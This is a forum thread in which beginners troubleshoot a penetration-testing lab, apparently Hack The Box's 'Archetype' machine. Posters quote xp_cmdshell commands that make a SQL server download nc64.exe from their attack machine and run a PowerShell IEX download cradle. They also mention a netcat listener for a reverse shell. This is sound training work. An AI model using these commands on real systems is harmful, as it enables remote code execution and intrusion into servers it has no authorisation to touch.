Thanks for checking. I was breezing through all the machines up to this one and now I’m getting tons of errors. I have zero idea what to do.
I’ve followed the write-up to a T, I’ve watched youtube tutorials, I’ve reset the machine & started from the beginning close to 10 times now over the past week, and I keep getting stuck on the part where you transfer the reverse shell from your python server to the machine.
I can’t figure out precisely what the issue is because every time I reset the box there’s something new. Sometimes the new machine fails before I even connect, sometimes it times out mid-exercise, but most of the time I get the same error:
“Unable to connect to the remote server”
I’ve ensured I’m using the IP address associated with the vpn (tun0’s ipv4 address, right?)
I’ve redownloaded the .ovpn file in case that was the issue
I reset the machine & start over if the connection times out
I allow the new machine addresses through the UFW firewall every time I reset it (even though this isn’t included in the accompanying write-up)
I double and triple check that I’m running the python http.server on port 80, and that netcat is listening on port 443
I’ve tried hosting the server on a variety of different ports (9000, 9009, 1234) just in case
I connect to both localhost:80 & {VPN IP}:80 via the browser just to make sure it’s up & the reverse shell file is there
I can ping my VPN IP from the SQL server & unless my server connection has timed out, it works
I’ve switched from ethernet to wifi, reset the machine, & started over just in case
I’ve tried typing the commands myself as well as copy-pasting from the walkthroughs
I’ve tried downloading nc64.exe & following the current walkthrough’s command: SQL> xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.23/nc64.exe -outfile nc64.exe”
as well as the powershell command that I’ve seen on the forums & in tutorials: (xp_cmdshell "powershell “IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.23/anyname.ps1\“);””)
I always get the error that it’s unable to connect to the remote server.
No matter what I try I can’t get the file to transfer because I can’t connect from the machine to my server. The server is serving, netcat is listening, I’ve updated sp_configure to allow xp_cmdshell to run & then reconfigured, I update the firewall settings to allow the machine IP access to my ports 80 & 443.
If I didn’t know any better I’d think this machine is faulty. Please prove to me that I’m stupid and missed something obvious.
I’ve tried changing the directory by first entering xp_cmdshell “PowerShell -c cd C:Users/sql_svc/Downloads” as a separate command, and it appears to work, but then when I pwd it shows that I haven’t changed directories. This is after ensuring I’m logged in as archetype and have updated sp_configure.
I thought not changing directories when that’s the only command was fishy but I also haven’t been able to advance past enabling xp_cmdshell at all. My machines end up timing out if I spend too long at this step so I tend to give it a few shots and then start over hoping it’ll work the next time.
When I try using the entire command from the walkthrough (change directories, transfer file), I receive the “unable to connect to remote server” error but it doesn’t specify that I have read only access. I’m not sure if it would though.
Unable to connect is maybe because you can’t get to your attack machine from the archtype server. Before you run the xp_cmdshell on the box you first need to start a web server locally on Kali (or whatever your using for your attack machine). So start that in another terminal:
sudo python3 -m http.server 80
Now check your tun0 on Kali and make sure your using that to connect back to from the server. So if my local Kali tun0 IP is 10.10.12.14 then after starting that webserver locally above I’d then use this xp_cmdshell:
xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.12.14/nc64.exe -outfile nc64.exe”
and was able to confirm I’m changing directories into the Downloads folder via this command - the issue appears to be entirely related to server access.
After replacing the IP in that command with my tun0 IP and running
xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.62/nc64.exe -outfile nc64.exe”
I’ve gotten the remote server error again. I’m attaching screenshots of the server terminal, the localhost directory, and the terminal I’m executing in just in case I’ve forgotten to explain something.
I do get a 200 code when I click on the exe file in my browser. All I can think of is that Fedora has a built-in firewall that I’m not considering or altering when I use UFW to whitelist the machine IP. I think you’re right, the error is because I can’t connect from archetype to the attack machine.
Screenshots below. I’m serving the folder with the exe on the left, and you can see the remote server error on the right.
Hey man, I’m still a newbie and I’m stuck on the same machine for over 3 days and I’m stuck at the same place. It always says Unable to connect to the remote server.
I’ve tried various forums and question boards online but none of them seems to solve the problem for me. If you find any working solution, please post it here.
I figured it out, kind of. Thanks @Pencer for helping me troubleshoot.
I used Kali instead of Fedora and had zero problems - I suspect it’s something to do with Fedora’s firewall configuration but I don’t know enough to pinpoint the issue.
If you’re reading this from the internet: try using Kali or another offensive security-focused OS.
Hey so, fellow noob here, here’s what I figured out, working through the PwnBox. PwnBox is already running a service on port 80, so I did this instead:
sudo python3 -m http.server 81
Now I know that http doesn’t usually run on port 81, but I wanted to see if I could make this work. And, it turns out that I can:
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://{YOUR IP HERE}:81/nc64.exe -outfile nc64.exe"
Basically, you’re specifying that the service is running on a non-traditional port. Inelegant, probably, but it worked. Did the same thing again later with winPEAS. To the more experienced dude(tte)s here, am I dumb for doing it that way?
